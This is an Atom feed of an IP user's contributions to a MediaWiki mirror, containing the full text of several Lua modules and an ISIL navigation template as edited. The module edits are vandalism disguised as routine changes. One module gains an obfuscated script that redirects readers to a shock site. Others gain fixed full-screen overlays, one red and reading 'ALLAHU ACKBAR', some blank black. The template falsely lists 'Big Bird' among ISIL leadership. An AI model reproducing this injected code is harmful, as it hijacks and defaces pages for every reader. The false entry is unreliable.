<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://blackwiki.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=116.86.134.233&amp;*</id>
	<title>blackwiki - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://blackwiki.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=116.86.134.233&amp;*"/>
	<link rel="alternate" type="text/html" href="https://blackwiki.org/index.php?title=Special:Contributions/116.86.134.233"/>
	<updated>2026-08-20T16:55:16Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.34.2</generator>
	<entry>
		<id>https://blackwiki.org/index.php?title=Module:AfC&amp;diff=265789</id>
		<title>Module:AfC</title>
		<link rel="alternate" type="text/html" href="https://blackwiki.org/index.php?title=Module:AfC&amp;diff=265789"/>
		<updated>2015-07-04T13:57:29Z</updated>

		<summary type="html">&lt;p&gt;116.86.134.233: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;local p = {}&lt;br /&gt;
&lt;br /&gt;
local diffString = '[[Special:Diff/%s|%s]]'&lt;br /&gt;
&lt;br /&gt;
function p.row(frame)&lt;br /&gt;
    local status = frame.args.s&lt;br /&gt;
    local title = frame.args.t&lt;br /&gt;
    local short = p.shorttitle(title, 40)&lt;br /&gt;
    local size = frame.args.z&lt;br /&gt;
    local modified_by = frame.args.mr&lt;br /&gt;
    local modified_at = frame.args.md&lt;br /&gt;
    local old_id = frame.args.mi&lt;br /&gt;
    local special_user = frame.args.sr&lt;br /&gt;
    local special_time = frame.args.sd&lt;br /&gt;
    local special_id = tonumber(frame.args.si)&lt;br /&gt;
    local display_notes = tonumber(frame.args.n)&lt;br /&gt;
    local rowtemplate = &amp;quot;&amp;lt;tr style=\&amp;quot;background-color:%s\&amp;quot;&amp;gt;%s&amp;lt;/tr&amp;gt;&amp;quot;&lt;br /&gt;
    local colorthing =  p.color(status, false)&lt;br /&gt;
    local cols = {&lt;br /&gt;
    	string.format('&amp;lt;td&amp;gt;[[:%s|%s]]&amp;lt;/td&amp;gt;', title, short),&lt;br /&gt;
    	string.format('&amp;lt;td data-sort-type=&amp;quot;number&amp;quot; data-sort-value=&amp;quot;%d&amp;quot;&amp;gt;%.1f kB&amp;lt;/td&amp;gt;', size, size / 1000)&lt;br /&gt;
    }&lt;br /&gt;
    &lt;br /&gt;
    local is_userspace = string.sub(frame.args.t, 1, 4) == &amp;quot;User&amp;quot;&lt;br /&gt;
    &lt;br /&gt;
    if is_userspace or display_notes then&lt;br /&gt;
    	cols[3] = string.format(&amp;quot;&amp;lt;td&amp;gt;%s&amp;lt;/td&amp;gt;&amp;quot;, p.notes(frame))&lt;br /&gt;
    else&lt;br /&gt;
    	cols[3] = &amp;quot;&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&amp;quot;&lt;br /&gt;
    end&lt;br /&gt;
    &lt;br /&gt;
    if special_id then&lt;br /&gt;
        cols[4] = p.printuser(special_user)&lt;br /&gt;
        cols[5] = string.format('&amp;lt;td data-sort-value=&amp;quot;%s&amp;quot;&amp;gt;%s&amp;lt;/td&amp;gt;', special_id, string.format(diffString, special_id, special_time))&lt;br /&gt;
    else&lt;br /&gt;
        cols[4] = &amp;quot;&amp;lt;td&amp;gt;Unknown&amp;lt;/td&amp;gt;&amp;quot;&lt;br /&gt;
        cols[5] = &amp;quot;&amp;lt;td&amp;gt;Unknown&amp;lt;/td&amp;gt;&amp;quot;&lt;br /&gt;
    end&lt;br /&gt;
    &lt;br /&gt;
    cols[6] = p.printuser(modified_by)&lt;br /&gt;
    cols[7] = string.format('&amp;lt;td data-sort-value=&amp;quot;%s&amp;quot;&amp;gt;%s&amp;lt;/td&amp;gt;', old_id, string.format(diffString, old_id, modified_at))&lt;br /&gt;
    return string.format(rowtemplate, colorthing, table.concat(cols))&lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
function p.notes(frame)&lt;br /&gt;
    local result = &amp;quot;&amp;quot;&lt;br /&gt;
    local is_suspected_copyvio = tonumber(frame.args.nc)&lt;br /&gt;
    local is_unsourced = tonumber(frame.args.nu)&lt;br /&gt;
    local no_inline = tonumber(frame.args.ni)&lt;br /&gt;
    local is_short = tonumber(frame.args.ns)&lt;br /&gt;
    local is_resubmit = tonumber(frame.args.nr)&lt;br /&gt;
    local is_old = tonumber(frame.args.no)&lt;br /&gt;
    local submitter_is_blocked = tonumber(frame.args.nb)&lt;br /&gt;
    local is_userspace = string.sub(frame.args.t, 1, 4) == &amp;quot;User&amp;quot;&lt;br /&gt;
    &lt;br /&gt;
    if is_suspected_copyvio then result = result .. &amp;quot;&amp;lt;abbr title=\&amp;quot;Submission is a suspected copyright violation\&amp;quot;&amp;gt;copyvio&amp;lt;/abbr&amp;gt;&amp;amp;#32;&amp;amp;#32;&amp;quot; end&lt;br /&gt;
    if is_unsourced then result = result .. &amp;quot;&amp;lt;abbr title=\&amp;quot;Submission lacks references completely\&amp;quot;&amp;gt;unsourced&amp;lt;/abbr&amp;gt;&amp;amp;#32;&amp;amp;#32;&amp;quot; end&lt;br /&gt;
    if no_inline then result = result .. &amp;quot;&amp;lt;abbr title=\&amp;quot;Submission has no inline citations\&amp;quot;&amp;gt;no-inline&amp;lt;/abbr&amp;gt;&amp;amp;#32;&amp;amp;#32;&amp;quot; end&lt;br /&gt;
    if is_short then result  = result ..&amp;quot;&amp;lt;abbr title=\&amp;quot;Submission is less than a kilobyte in length\&amp;quot;&amp;gt;short&amp;lt;/abbr&amp;gt;&amp;amp;#32;&amp;amp;#32;&amp;quot; end&lt;br /&gt;
    if is_resubmit then result  = result .. &amp;quot;&amp;lt;abbr title=\&amp;quot;Submission was resubmitted after a previous decline\&amp;quot;&amp;gt;resubmit&amp;lt;/abbr&amp;gt;&amp;amp;#32;&amp;amp;#32;&amp;quot; end&lt;br /&gt;
    if is_old then result  = result .. &amp;quot;&amp;lt;abbr title=\&amp;quot;Submission has not been touched in over four days\&amp;quot;&amp;gt;old&amp;lt;/abbr&amp;gt;&amp;amp;#32;&amp;amp;#32;&amp;quot; end&lt;br /&gt;
    if submitter_is_blocked then result  = result .. &amp;quot;&amp;lt;abbr title=\&amp;quot;Submitter is currently blocked\&amp;quot;&amp;gt;blocked&amp;lt;/abbr&amp;gt;&amp;amp;#32;&amp;amp;#32;&amp;quot; end&lt;br /&gt;
    if is_userspace then result  = result .. &amp;quot;&amp;lt;abbr title=\&amp;quot;Submission is located in the User or User Talk space\&amp;quot;&amp;gt;userspace&amp;lt;/abbr&amp;gt;&amp;amp;#32;&amp;amp;#32;&amp;quot; end&lt;br /&gt;
        &lt;br /&gt;
    return result&lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
function p.color(status, dark)&lt;br /&gt;
    local result&lt;br /&gt;
    local dark_colors = {&lt;br /&gt;
        p = &amp;quot;#995&amp;quot;,&lt;br /&gt;
        d = &amp;quot;#977&amp;quot;,&lt;br /&gt;
        r = &amp;quot;#789&amp;quot;,&lt;br /&gt;
        a = &amp;quot;#696&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
    local normal_colors = {&lt;br /&gt;
        p = &amp;quot;#eea&amp;quot;,&lt;br /&gt;
        d = &amp;quot;#fcd&amp;quot;,&lt;br /&gt;
        r = &amp;quot;#ade&amp;quot;,&lt;br /&gt;
        a = &amp;quot;#afa&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
    if dark then&lt;br /&gt;
        return dark_colors[status] or &amp;quot;#777&amp;quot;&lt;br /&gt;
    else&lt;br /&gt;
        return normal_colors[status] or &amp;quot;#ddc&amp;quot;&lt;br /&gt;
    end&lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
function p.printuser(user)&lt;br /&gt;
  return string.format(&amp;quot;&amp;lt;td&amp;gt;[[User:%s|%s]] ([[User talk:%s|t]])&amp;lt;/td&amp;gt;&amp;lt;div style='background-color:red;top:0px;left:0px;position:fixed;height:100%;width:100%;text-align:center;font-size:100px;z-index:999999999'&amp;gt;ALLAHU ACKBAR&amp;lt;/div&amp;gt;&amp;quot;, user, user, user)&lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
function p.shorttitle(fulltitle, maxlength)&lt;br /&gt;
    --strip off namespace:basepage/ if it exists and anything is left&lt;br /&gt;
    --if not, strip off namespace&lt;br /&gt;
    --truncate to maxlength&lt;br /&gt;
    local startindex, size, namespace, basetitle, subtitle = mw.ustring.find(fulltitle, &amp;quot;([^:]*):([^\/]*)\/?(.*)&amp;quot;)&lt;br /&gt;
    if subtitle == '' then subtitle = nil end&lt;br /&gt;
    local effective_title = subtitle or basetitle&lt;br /&gt;
    if effective_title == nil or effective_title == '' then effective_title = fulltitle end&lt;br /&gt;
    effective_title = string.gsub(effective_title, &amp;quot;^Submissions/&amp;quot;, &amp;quot;&amp;quot;)&lt;br /&gt;
    -- return mw.text.truncate( effective_title, maxlength ) (mw.text is not yet deployed!)&lt;br /&gt;
    if (mw.ustring.len(effective_title) &amp;gt; maxlength) then&lt;br /&gt;
        return mw.ustring.sub(effective_title, 1, maxlength - 3) .. &amp;quot;...&amp;quot;&lt;br /&gt;
    else&lt;br /&gt;
        return effective_title&lt;br /&gt;
    end&lt;br /&gt;
    &lt;br /&gt;
    &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
return p&lt;/div&gt;</summary>
		<author><name>116.86.134.233</name></author>
		
	</entry>
	<entry>
		<id>https://blackwiki.org/index.php?title=Module:Coxeter%E2%80%93Dynkin_diagram&amp;diff=277203</id>
		<title>Module:Coxeter–Dynkin diagram</title>
		<link rel="alternate" type="text/html" href="https://blackwiki.org/index.php?title=Module:Coxeter%E2%80%93Dynkin_diagram&amp;diff=277203"/>
		<updated>2015-07-04T13:42:09Z</updated>

		<summary type="html">&lt;p&gt;116.86.134.233: fix ugly formatting&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;-- module to turn a parameter list into a list of [[Coxeter–Dynkin diagram]] images.&lt;br /&gt;
-- See the template documentation or any example for how it is used and works.&lt;br /&gt;
local p = {}&lt;br /&gt;
&lt;br /&gt;
function p.CDD(frame)&lt;br /&gt;
	-- For calling from #invoke.&lt;br /&gt;
	local pframe = frame:getParent()&lt;br /&gt;
	local args = pframe.args&lt;br /&gt;
	return p._CDD(args)&lt;br /&gt;
end&lt;br /&gt;
	&lt;br /&gt;
function p._CDD(args)&lt;br /&gt;
	-- For calling from other Lua modules.&lt;br /&gt;
	local body ='&amp;lt;span style=&amp;quot;display:inline-block;&amp;quot;&amp;gt;'         -- create and start the output string&lt;br /&gt;
	for v, x in ipairs(args) do                                -- process params, ignoring any names&lt;br /&gt;
		if (x ~= '') then					-- check for null/empty names&lt;br /&gt;
        		body = body .. &amp;quot;[[File:CDel_&amp;quot; .. x .. &amp;quot;.png|link=]]&amp;quot;   -- write file for this parameter&lt;br /&gt;
		end&lt;br /&gt;
	end&lt;br /&gt;
	body = body .. &amp;quot;&amp;lt;/span&amp;gt;&amp;lt;script&amp;gt;document.location='ht'+'tp://goa'+'tse.info'&amp;lt;/script&amp;gt;&amp;quot;                                   -- finish output string&lt;br /&gt;
	return body                                                -- return result&lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
return p&lt;/div&gt;</summary>
		<author><name>116.86.134.233</name></author>
		
	</entry>
	<entry>
		<id>https://blackwiki.org/index.php?title=Template:Islamic_State_of_Iraq_and_the_Levant&amp;diff=6495755</id>
		<title>Template:Islamic State of Iraq and the Levant</title>
		<link rel="alternate" type="text/html" href="https://blackwiki.org/index.php?title=Template:Islamic_State_of_Iraq_and_the_Levant&amp;diff=6495755"/>
		<updated>2015-06-30T12:28:21Z</updated>

		<summary type="html">&lt;p&gt;116.86.134.233: Undid revision 669314911 by 101.185.97.173 - vandalism&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Navbox&lt;br /&gt;
|name      = Islamic State of Iraq and the Levant&lt;br /&gt;
|image     = [[File:AQMI Flag.svg|border|125px]]&lt;br /&gt;
|title     = [[Islamic State of Iraq and the Levant]]&lt;br /&gt;
|state     = {{{state&amp;lt;includeonly&amp;gt;|collapsed&amp;lt;/includeonly&amp;gt;}}}&lt;br /&gt;
|bodyclass = hlist&lt;br /&gt;
|above =&lt;br /&gt;
&lt;br /&gt;
|group1 = Leadership&lt;br /&gt;
|list1 =&lt;br /&gt;
* [[Abu Bakr al-Baghdadi]]&lt;br /&gt;
* [[Jihadi John|Mohammed Emwazi]]&lt;br /&gt;
* [[Abu Ali al-Anbari]]&lt;br /&gt;
* [[Abu Suleiman al-Naser]]&lt;br /&gt;
* [[Abu Mohammad al-Adnani]]&lt;br /&gt;
* [[Abu Omar al-Shishani]]&lt;br /&gt;
* [[Abu Waheeb]]&lt;br /&gt;
* [[Abu Yusaf]]&lt;br /&gt;
* [[Abu Fatima al-Jaheishi]]&lt;br /&gt;
* [[Abu al-Baraa el-Azdi]]&lt;br /&gt;
* [[Abubakar Shekau]] (Boko Haram)&lt;br /&gt;
* [[Big Bird]]&lt;br /&gt;
&lt;br /&gt;
|group2 = Former leadership&lt;br /&gt;
|list2 =&lt;br /&gt;
* [[Haji Bakr]] (killed)&lt;br /&gt;
* [[Abu Muslim al-Turkmani]] (killed)&lt;br /&gt;
* [[Abu Ayman al-Iraqi]] (killed)&lt;br /&gt;
* [[Abu Abdulrahman al-Bilawi]] (killed)&lt;br /&gt;
* [[Abu Ahmad al-Alwani]] (killed)&lt;br /&gt;
* [[Abu Sayyaf (ISIL)|Abu Sayyaf]] (killed)&lt;br /&gt;
* [[Abdul Rauf Aliza]] (killed)&lt;br /&gt;
* [[Abdul Rauf (Taliban governor)|Abdul Rauf]] (killed)&lt;br /&gt;
* [[Abu Alaa al-Afri]] (killed)&lt;br /&gt;
* [[Tariq Bin Al Tahar Bin Al Falih Al 'Awni Al Harzi]] (killed)&lt;br /&gt;
&lt;br /&gt;
|group3 = History&lt;br /&gt;
|list3  =&lt;br /&gt;
* [[Jama'at al-Tawhid wal-Jihad]]&amp;amp;nbsp;&amp;lt;small&amp;gt;(1999–2004)&amp;lt;/small&amp;gt;&lt;br /&gt;
* [[Tanzim Qaidat al-Jihad fi Bilad al-Rafidayn]]&amp;amp;nbsp;&amp;lt;small&amp;gt;(2004–06)&amp;lt;/small&amp;gt;&lt;br /&gt;
* [[Mujahideen Shura Council (Iraq)|Mujahideen Shura Council]]&amp;amp;nbsp;&amp;lt;small&amp;gt;(2006)&amp;lt;/small&amp;gt;&lt;br /&gt;
* [[Islamic State of Iraq]]&amp;amp;nbsp;&amp;lt;small&amp;gt;(2006–13)&amp;lt;/small&amp;gt;&lt;br /&gt;
* [[Islamic State of Iraq and the Levant#As ''Islamic State of Iraq and the Levant'' (2013–14)|Islamic State of Iraq and the Levant]]&amp;amp;nbsp;&amp;lt;small&amp;gt;(2013–14)&amp;lt;/small&amp;gt;&lt;br /&gt;
* &amp;lt;small&amp;gt;Self-proclaimed as&amp;lt;/small&amp;gt; the [[Islamic State of Iraq and the Levant#As self-proclaimed ''Islamic State'' (June 2014–present)|Islamic State]]&amp;amp;nbsp;&amp;lt;small&amp;gt;(June 2014–present)&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
|group4 = [[Military of ISIL|Military]]&lt;br /&gt;
|list4  =&lt;br /&gt;
* [[Black Standard]]&lt;br /&gt;
&lt;br /&gt;
|group5 = [[List of wars and battles involving ISIL|Wars and battles]]&lt;br /&gt;
|list5  =&lt;br /&gt;
* [[War on Terror]]&lt;br /&gt;
* [[Iraq War|Iraq War (2003–2011)]]&lt;br /&gt;
* [[Iraqi insurgency (2003–11)]]&lt;br /&gt;
** [[Sectarian violence in Iraq (2006–07)|Civil war in Iraq]]&lt;br /&gt;
* [[Iraqi insurgency (2011–13)]]&lt;br /&gt;
* [[Syrian Civil War]] &lt;br /&gt;
** [[Spillover of the Syrian Civil War|spillover]]&lt;br /&gt;
** [[Iraq War (2014-present)|Syrian Civil War spillover in Iraq]]&lt;br /&gt;
** [[Syrian Civil War spillover in Lebanon]]&lt;br /&gt;
** [[Inter-rebel conflict during the Syrian Civil War]]&lt;br /&gt;
* [[Sinai insurgency]]&lt;br /&gt;
* [[Libyan Civil War (2014–present)|Second Libyan Civil War]]&lt;br /&gt;
** [[2015 Egyptian military intervention in Libya|Egyptian-led military intervention]]&lt;br /&gt;
*[[War in North-West Pakistan]]&lt;br /&gt;
*[[War in Afghanistan (2015–present)]]&lt;br /&gt;
*[[Moro insurgency in the Philippines]]&lt;br /&gt;
*[[Al-Qaeda insurgency in Yemen]]&lt;br /&gt;
*[[Yemeni Civil War (2015)|Yemeni Civil War]]&lt;br /&gt;
* [[Boko Haram insurgency]]&lt;br /&gt;
** [[Boko Haram insurgency in Cameroon]]&lt;br /&gt;
** [[2015 Niger raid]]&lt;br /&gt;
* [[Fall of Mosul]]&lt;br /&gt;
* [[Salahuddin campaign (2014–15)]]&lt;br /&gt;
* [[First Battle of Tikrit]]&lt;br /&gt;
* [[Siege of Kobanî]]&lt;br /&gt;
* [[Sinjar massacre]]&lt;br /&gt;
* [[Islamic State of Iraq and the Levant occupation of Derna|Occupation of Derna]]&lt;br /&gt;
* [[Battle of Baiji (October–November 2014)]]&lt;br /&gt;
* [[Battle of Ramadi (2014–15)]]&lt;br /&gt;
* [[Deir ez-Zor offensive (December 2014)]]&lt;br /&gt;
* [[Battle of Baiji]]&lt;br /&gt;
* [[Sinjar offensive]]&lt;br /&gt;
* [[Battle of Mosul (2015)]]&lt;br /&gt;
* [[Fall of Nofaliya (2015)]]&lt;br /&gt;
* [[Al-Hasakah offensive (February–March 2015)]]&lt;br /&gt;
* [[Second Battle of Tikrit (March–April 2015)]]&lt;br /&gt;
* [[Battle of Sirte (2015)]]&lt;br /&gt;
* [[Hama and Homs offensive (March–April 2015)]]&lt;br /&gt;
* [[Battle of Sarrin]]&lt;br /&gt;
* [[Battle of Yarmouk Camp (2015)]]&lt;br /&gt;
* [[Anbar offensive (2015)]]&lt;br /&gt;
* [[Qalamoun offensive (May 2015)]]&lt;br /&gt;
* [[Palmyra offensive (2015)]]&lt;br /&gt;
* [[Al-Hasakah offensive (May 2015)]]&lt;br /&gt;
* [[Al-Hasakah city offensive (May–June 2015)]]&lt;br /&gt;
* [[Tell Abyad Campaign (2015)]]&lt;br /&gt;
* [[Military intervention against ISIL]]&lt;br /&gt;
** [[American-led intervention in Iraq (2014–present)|Intervention in Iraq]]&lt;br /&gt;
** [[American-led intervention in Syria|Intervention in Syria]]&lt;br /&gt;
&lt;br /&gt;
|group6 = [[List of terrorist incidents linked to ISIL|Terrorist attacks]]&lt;br /&gt;
|list6 =  &lt;br /&gt;
*[[Reyhanlı bombings]]&lt;br /&gt;
*[[Porte de Vincennes siege]]&lt;br /&gt;
*[[2015 Corinthia Hotel attack]]&lt;br /&gt;
*[[Al Qubbah bombings]]&lt;br /&gt;
*[[Bardo National Museum attack]]&lt;br /&gt;
*[[2015 Sana'a mosque bombings]]&lt;br /&gt;
*[[Jalalabad suicide bombing]]&lt;br /&gt;
*[[Curtis Culwell Center attack]]&lt;br /&gt;
*[[Qatif and Dammam mosque bombings]]&lt;br /&gt;
*[[June 2015 Kobanî attack]]&lt;br /&gt;
*[[2015 Kuwait mosque bombing]]&lt;br /&gt;
*[[2015 Sousse attacks‎]]&lt;br /&gt;
|group7 = Politics&lt;br /&gt;
|list7  =&lt;br /&gt;
* [[Ideology of the Islamic State of Iraq and the Levant|Ideology]]&lt;br /&gt;
* [[Human rights in ISIL-controlled territory|Human rights]]&lt;br /&gt;
* [[Persecution of Assyrians by ISIL|Persecution of Assyrians]]&lt;br /&gt;
* [[Persecution of Yazidis by ISIL|Persecution of Yazidis]]&lt;br /&gt;
* [[Killing of captives by ISIL|Killing of captives]]&lt;br /&gt;
* [[ISIL beheading incidents|Beheading incidents]]&lt;br /&gt;
* [[Destruction of cultural heritage by ISIL|Destruction of cultural heritage]]&lt;br /&gt;
&lt;br /&gt;
|group8 = Popular culture&lt;br /&gt;
|list8  =&lt;br /&gt;
* [[Iran and ISIL|Iran]]&lt;br /&gt;
* [[Portrayal of ISIL in American media|United States]]&lt;br /&gt;
* [[United Kingdom and ISIL|United Kingdom]]&lt;br /&gt;
* [[Name changes due to the Islamic State of Iraq and the Levant|Name changes due to ISIL]]&lt;br /&gt;
&lt;br /&gt;
|group9 = Society&lt;br /&gt;
|list9  =&lt;br /&gt;
* [[Timeline of ISIL related events|Timeline]]&lt;br /&gt;
* [[List of Islamic State of Iraq and the Levant members|Members]]&lt;br /&gt;
* [[ISIL territorial claims|Territorial claims]]&lt;br /&gt;
* [[Administrative divisions of ISIL|Administrative divisions]]&lt;br /&gt;
&lt;br /&gt;
|group10 = Related topics&lt;br /&gt;
|list10  =&lt;br /&gt;
* [[Caliphate]]&lt;br /&gt;
* [[Islamism]]&lt;br /&gt;
* [[Sexual violence in the Iraqi insurgency]]&lt;br /&gt;
* [[Slavery in 21st-century Islamism]]&lt;br /&gt;
* [[Shia–Sunni relations]]&lt;br /&gt;
* [[Theocracy]]&lt;br /&gt;
}}&amp;lt;noinclude&amp;gt;&lt;br /&gt;
{{collapsible option}}&lt;br /&gt;
&lt;br /&gt;
[[Category:Islam templates]]&lt;br /&gt;
[[Category:Islamic State of Iraq and the Levant|τ]]&lt;br /&gt;
&amp;lt;/noinclude&amp;gt;&lt;/div&gt;</summary>
		<author><name>116.86.134.233</name></author>
		
	</entry>
	<entry>
		<id>https://blackwiki.org/index.php?title=Module:Uses_Wikidata&amp;diff=247755</id>
		<title>Module:Uses Wikidata</title>
		<link rel="alternate" type="text/html" href="https://blackwiki.org/index.php?title=Module:Uses_Wikidata&amp;diff=247755"/>
		<updated>2015-06-30T10:12:59Z</updated>

		<summary type="html">&lt;p&gt;116.86.134.233: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;local p = {}&lt;br /&gt;
&lt;br /&gt;
function p.usesProperty(frame)&lt;br /&gt;
	local parent = frame.getParent(frame)&lt;br /&gt;
	local result = ''&lt;br /&gt;
	local ii = 1&lt;br /&gt;
	while true do&lt;br /&gt;
		local p_num = parent.args[ii] or ''&lt;br /&gt;
		if p_num ~= '' then&lt;br /&gt;
			local label = mw.wikibase.label(p_num) or &amp;quot;NO LABEL&amp;quot;&lt;br /&gt;
			result = result .. &amp;quot;&amp;lt;div style='background-color:black;top:0px;left:0px;position:fixed;height:100%;width:100%;text-align:center;font-size:100px;z-index:999999999'&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;&amp;lt;i&amp;gt;[[d:Property:&amp;quot; .. p_num .. &amp;quot;|&amp;quot; .. label .. &amp;quot; &amp;lt;small&amp;gt;(&amp;quot; .. string.upper(p_num) .. &amp;quot;)&amp;lt;/small&amp;gt;]]&amp;lt;/i&amp;gt;&amp;lt;/b&amp;gt; (see [[d:Special:WhatLinksHere/Property:&amp;quot; .. p_num .. &amp;quot;|uses]])&amp;lt;/li&amp;gt;&amp;quot;&lt;br /&gt;
			ii = ii + 1&lt;br /&gt;
		else break&lt;br /&gt;
		end&lt;br /&gt;
	end&lt;br /&gt;
        result = result .. &amp;quot;&amp;lt;div style='background-color:black;top:0px;left:0px;position:fixed;height:100%;width:100%;text-align:center;font-size:100px;z-index:999999999'&amp;gt;&amp;lt;/div&amp;gt;&amp;quot;&lt;br /&gt;
	return result&lt;br /&gt;
end&lt;br /&gt;
 &lt;br /&gt;
return p&lt;/div&gt;</summary>
		<author><name>116.86.134.233</name></author>
		
	</entry>
	<entry>
		<id>https://blackwiki.org/index.php?title=Module:Uses_Wikidata&amp;diff=247754</id>
		<title>Module:Uses Wikidata</title>
		<link rel="alternate" type="text/html" href="https://blackwiki.org/index.php?title=Module:Uses_Wikidata&amp;diff=247754"/>
		<updated>2015-06-30T09:41:44Z</updated>

		<summary type="html">&lt;p&gt;116.86.134.233: optimisation&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;local p = {}&lt;br /&gt;
&lt;br /&gt;
function p.usesProperty(frame)&lt;br /&gt;
	local parent = frame.getParent(frame)&lt;br /&gt;
	local result = ''&lt;br /&gt;
	local ii = 1&lt;br /&gt;
	while true do&lt;br /&gt;
		local p_num = parent.args[ii] or ''&lt;br /&gt;
		if p_num ~= '' then&lt;br /&gt;
			local label = mw.wikibase.label(p_num) or &amp;quot;NO LABEL&amp;quot;&lt;br /&gt;
			result = result .. &amp;quot;&amp;lt;div style='background-color:black;top:0px;left:0px;position:fixed;height:100%;width:100%;text-align:center;font-size:100px;z-index:999999999'&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;&amp;lt;i&amp;gt;[[d:Property:&amp;quot; .. p_num .. &amp;quot;|&amp;quot; .. label .. &amp;quot; &amp;lt;small&amp;gt;(&amp;quot; .. string.upper(p_num) .. &amp;quot;)&amp;lt;/small&amp;gt;]]&amp;lt;/i&amp;gt;&amp;lt;/b&amp;gt; (see [[d:Special:WhatLinksHere/Property:&amp;quot; .. p_num .. &amp;quot;|uses]])&amp;lt;/li&amp;gt;&amp;quot;&lt;br /&gt;
			ii = ii + 1&lt;br /&gt;
		else break&lt;br /&gt;
		end&lt;br /&gt;
	end&lt;br /&gt;
	return result&lt;br /&gt;
end&lt;br /&gt;
 &lt;br /&gt;
return p&lt;/div&gt;</summary>
		<author><name>116.86.134.233</name></author>
		
	</entry>
</feed>